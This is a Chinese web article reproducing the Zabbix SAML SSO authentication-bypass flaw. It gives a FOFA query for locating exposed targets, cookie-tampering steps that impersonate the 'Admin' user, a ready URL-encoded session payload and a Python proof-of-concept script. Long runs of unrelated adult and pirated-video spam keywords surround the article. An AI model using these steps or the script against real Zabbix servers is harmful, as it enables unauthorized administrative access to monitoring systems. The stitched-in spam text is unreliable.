成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久

您的位置:首頁技術文章
文章詳情頁

Zabbix SAML SSO 登錄繞過漏洞的操作流程

瀏覽:522日期:2023-04-06 15:09:27
目錄
  • 一、簡介
  • 二、FOFA語法
  • 三、復現流程

一、簡介

zabbix是一個基于WEB界面的提供分布式系統監視以及網絡監視功能的企業級的開源解決方案。zabbix能監視各種網絡參數,保證服務器系統的安全運營;并提供靈活的通知機制以讓系統管理員快速定位/解決存在的各種問題。

zabbix server可以通過SNMP,zabbix agent,ping,端口監視等方法提供對遠程服務器/網絡狀態的監視,數據收集等功能,它可以運行在Linux,Solaris,HP-UX,AIX,Free BSD,Open BSD,OS X等平臺上。

該漏洞源于在啟用 saml SSO 身份驗證(非默認)的情況下,未身份驗證的攻擊者可以修改會話數據,成功繞過前臺進入后臺,因為存儲在會話中的用戶登錄未經過驗證。

漏洞的限制條件:需要啟用 SAML 身份驗證,并且攻擊者必須知道 Zabbix 用戶的用戶名。

二、FOFA語法

app=“ZABBIX-監控系統” && body=“SAML”

三、復現流程

1、通過fofa語法搜索zabbix資產訪問首頁獲取set-cookie中zbx_session參數的值

2、通過Url解碼和Base64解碼獲得zbx_session參數Json格式數據

{"sessionid":"67f71355eb96121f384ea0571290faca","sign":"Uyq2BXQfe5Iug4UBpucwq3PXAmVh0ctpR4pvEfzg\/OWe7TKhmAQdqyu5iUmtWzQR+0m33eQBHnk1VV+IO0icAQ=="}

3、通過在Json中添加saml_data和username_attribute參數后重新Base64編碼和Url編碼構造Payload

{"saml_data":{"username_attribute":"Admin"},"sessionid":"67f71355eb96121f384ea0571290faca","sign":"Uyq2BXQfe5Iug4UBpucwq3PXAmVh0ctpR4pvEfzg\/OWe7TKhmAQdqyu5iUmtWzQR+0m33eQBHnk1VV+IO0icAQ=="}

4、把構造好的payload進行base64編碼和url編碼

%65%79%4a%7a%59%57%31%73%58%32%52%68%64%47%45%69%4f%6e%73%69%64%58%4e%6c%63%6d%35%68%62%57%56%66%59%58%52%30%63%6d%6c%69%64%58%52%6c%49%6a%6f%69%51%57%52%74%61%57%34%69%66%53%77%69%63%32%56%7a%63%32%6c%76%62%6d%6c%6b%49%6a%6f%69%4e%6a%64%6d%4e%7a%45%7a%4e%54%56%6c%59%6a%6b%32%4d%54%49%78%5a%6a%4d%34%4e%47%56%68%4d%44%55%33%4d%54%49%35%4d%47%5a%68%59%32%45%69%4c%43%4a%7a%61%57%64%75%49%6a%6f%69%56%58%6c%78%4d%6b%4a%59%55%57%5a%6c%4e%55%6c%31%5a%7a%52%56%51%6e%42%31%59%33%64%78%4d%31%42%59%51%57%31%57%61%44%42%6a%64%48%42%53%4e%48%42%32%52%57%5a%36%5a%31%77%76%54%31%64%6c%4e%31%52%4c%61%47%31%42%55%57%52%78%65%58%55%31%61%56%56%74%64%46%64%36%55%56%49%72%4d%47%30%7a%4d%32%56%52%51%6b%68%75%61%7a%46%57%56%69%74%4a%54%7a%42%70%59%30%46%52%50%54%30%69%66%51%3d%3d

5、請求index_sso.php,在http請求頭中構造payload,將zbx_session的值替換為url編碼后的payload

6、成功登錄后臺

可利用poc直接獲取構造后的payload

poc:

import requestsimport reimport urllib.parseimport base64import jsonimport sys def exp(target, username):	resp = requests.get(url=target, verify=False)	cookie = resp.headers.get("Set-Cookie")	zbx_session = re.findall(r"zbx_session=(.*?); ", cookie)	url_decode_data = urllib.parse.unquote(zbx_session[0], encoding="utf-8")	base64_decode_data = base64.b64decode(url_decode_data)	decode_to_str = str(base64_decode_data, encoding="utf-8")	to_json = json.loads(decode_to_str)	tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"])	payloadJson = json.dumps(tmp_ojb)	print("decode_payload:", payloadJson)	payload = urllib.parse.quote(base64.b64encode(payloadJson.encode()))	print("zbx_signed_session:", payload)if __name__ == "__main__":	if len(sys.argv) != 3:		print("argv error")		exit(0)	target = sys.argv[1]	username = sys.argv[2]	exp(target, username)

到此這篇關于Zabbix SAML SSO 登錄繞過漏洞的文章就介紹到這了,更多相關Zabbix 登錄繞過漏洞內容請搜索以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持!

標簽: Zabbix
成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久
欧美日韩国产高清一区| ●精品国产综合乱码久久久久 | 中国女人久久久| 国产精品v日韩精品v欧美精品网站| 国产v日产∨综合v精品视频| 韩国av一区二区| 精品无人码麻豆乱码1区2区 | 亚洲欧美日韩国产一区| 国产精品日韩久久久| 国产精品裸体一区二区三区| 国产一区二区黄色| 裸体一区二区| 在线观看国产一区二区| 欧美午夜一区二区三区免费大片| 狂野欧美一区| 欧美日韩精品专区| 欧美一区二区在线免费播放 | 国产乱一区二区| 国产精品资源站在线| www.日韩av| 欧美精品一区在线| 亚洲日本国产| 久热这里只精品99re8久| 欧美在线免费视屏| 欧美成人video| 亚洲国产精品传媒在线观看| 日韩理论片中文av| 人妖欧美一区二区| 国产99久久久精品| 欧美日韩网址| 欧美资源在线| 欧美人狂配大交3d怪物一区| 久久先锋资源网| 久久精品成人一区二区三区蜜臀| 欧美羞羞免费网站| 久久中文字幕电影| 亚洲一区二区三区不卡国产欧美| 日本亚洲免费观看| 国产精品久久毛片a| 亚洲国产精品一区二区久久| 国产乱子伦视频一区二区三区| www.成人在线| 亚洲一区二区在线看| 欧美一区二区三区免费视频| 亚洲国产高清aⅴ视频| 日韩成人伦理电影在线观看| 99国产精品久久久久| 日韩视频一区二区三区在线播放 | 久久福利毛片| 日韩欧美国产午夜精品| 亚洲男人天堂av网| 国产精品影视天天线| 亚洲高清在线| 欧美一级免费大片| 一区二区三区中文免费| 高清日韩电视剧大全免费| 夜夜嗨网站十八久久 | 国内精品嫩模私拍在线| 亚洲视频观看| 91精品久久久久久蜜臀| 伊人色综合久久天天| 国产白丝网站精品污在线入口| 99re6热在线精品视频播放速度| 欧美日韩在线直播| 一区二区成人在线观看| 成人精品gif动图一区| 色婷婷久久综合| 中文字幕在线不卡视频| 国产乱码精品一区二区三区忘忧草 | 亚洲精品日韩专区silk| 成人app网站| 欧美丝袜丝交足nylons| 亚洲精品视频在线| 欧美69视频| 日韩视频一区二区在线观看| 婷婷久久综合九色综合绿巨人| 欧美日韩免费| 久久久久久久综合狠狠综合| 久久成人精品无人区| 国产日韩欧美一区| 中文字幕第一区第二区| 99在线精品一区二区三区| 欧美三区在线视频| 天堂av在线一区| 国产精品一区二区三区四区五区| 久久日一线二线三线suv| 国产精品资源网站| 91成人在线免费观看| 亚洲已满18点击进入久久| 国产一区二区中文字幕免费看| 精品日韩一区二区三区| 国产99久久精品| 欧美精品在线一区二区| 久久99精品久久久久久动态图 | 国产激情视频一区二区在线观看| 久久精品日韩| 亚洲va国产天堂va久久en| 亚洲精品一区二| 亚洲欧美日韩在线| 亚洲美女91| 一区二区三区在线免费播放| 99视频一区| 亚洲一区中文日韩| 亚洲一区二区三区四区五区午夜| 欧美亚洲国产一区二区三区 | 国产麻豆精品一区二区| 欧美日韩国产高清一区二区 | 日韩你懂的电影在线观看| 黄色小说综合网站| 欧美日韩综合在线| 国产一区成人| 一卡二卡欧美日韩| 色婷婷综合久久久久中文| 奇米在线7777在线精品| 欧美色老头old∨ideo| 国产一区二区三区在线观看免费 | 久久综合伊人| 久久成人免费电影| 91精品久久久久久久久99蜜臂| 国产一区二区在线影院| 日韩欧美一级二级三级| 99视频有精品| 欧美激情一区二区三区不卡| 一区三区视频| 亚洲国产精品精华液网站| 在线视频中文字幕一区二区| 国产成人激情av| 樱桃成人精品视频在线播放| 亚洲成av人影院| 在线电影院国产精品| 91在线视频免费观看| 中文字幕一区二区三| 老色鬼久久亚洲一区二区| 国产一区在线不卡| 国产精品色婷婷| 亚洲一区二三| 国产成人一区在线| 中文字幕乱码亚洲精品一区| 亚洲男女自偷自拍| 欧美极品美女视频| 久久久精品五月天| 成人综合在线视频| 一区二区三区四区乱视频| 欧美日韩成人综合天天影院| 色综合中文字幕| 日韩精品一级二级| 精品人伦一区二区色婷婷| 中文日韩在线| 成人中文字幕在线| 亚洲国产一区二区在线播放| 欧美一区二区不卡视频| 亚洲黄色毛片| 国产精品污www在线观看| 色婷婷综合在线| 欧美精品97| 久久99精品久久久久久国产越南 | 久久国产精品久久精品国产| 成人一级片在线观看| 亚洲精品视频在线看| 欧美成人综合网站| 国产高清精品久久久久| 亚洲精品国产精品乱码不99| 欧美一卡2卡三卡4卡5免费| 国产精品久久九九| 99热国产精品| 麻豆精品久久精品色综合| 国产精品欧美久久久久无广告| 欧美亚洲日本国产| 99精品欧美一区二区三区| 99久久精品国产一区| 日韩高清不卡一区二区| 中文字幕一区二区不卡| 国产精品av一区二区| 国产专区欧美精品| 午夜久久久影院| 成人免费在线播放视频| 精品日韩av一区二区| 欧美午夜一区二区三区 | 亚洲色图视频网| 久久久国产综合精品女国产盗摄| 欧美丝袜第三区| 久久精品一本| 在线观看不卡| 欧美精品色网| 97se亚洲国产综合自在线| 国产乱一区二区| 日韩一级片网站| 欧美日韩在线精品一区二区三区激情| 影音先锋中文字幕一区| 97精品国产97久久久久久久久久久久 | 久久久一区二区| 91精品午夜视频| 欧美午夜在线观看| 在线观看视频欧美| 欧美亚洲一级| 性欧美videos另类喷潮| 欧美亚洲色图校园春色| 亚洲一区日韩| 香蕉成人久久| 一本色道**综合亚洲精品蜜桃冫|